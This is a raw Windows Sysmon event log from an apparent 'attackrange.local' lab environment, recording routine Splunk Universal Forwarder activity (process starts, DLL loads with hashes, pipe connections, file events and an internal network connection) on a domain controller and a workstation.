providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x800000000000000057345016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.824{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:11.823{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 354300x800000000000000057345007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:41.477{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54527-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 534500x800000000000000057345006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.392{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057345005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.392{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.392{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.392{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057345002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BC45D10B7CA77318BC68AE59E711E1,SHA256=4E0ED728E450C72CA602882AABE69964074458E0793164F32404C6E977633252falsetrue 11241100x800000000000000057345000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.239{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.239{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F54A2966D82AE76C293FC6B6C94A4CF,SHA256=E79003DA45E3C3786105EFFC88E2F58D86A638D6586864FF863A19B58BD4502Bfalsetrue 23542300x800000000000000021219441Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.851{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE184FF53D2FB6C5043A9DA4789B8AF7,SHA256=F5D1CECBD08889E58F508FEE5DCD91B1338549C157EC39FA3C527EFF93035149,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219440Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B0B-618E-07CE-08000000F101}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219439Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219438Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219437Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219436Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219435Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B0B-618E-07CE-08000000F101}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219434Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.554{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B0B-618E-07CE-08000000F101}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219433Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.540{AD5E2759-5B0B-618E-07CE-08000000F101}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219432Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.086{AD5E2759-54C7-6143-A600-00000000F101}4072NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.192{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.191{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.191{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.189{8B6011A9-5B0B-618E-3DF3-04000000F101}8648\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057344994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.189{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x800000000000000057344992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x800000000000000057344983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.170{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.154{8B6011A9-5B0B-618E-3DF3-04000000F101}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, 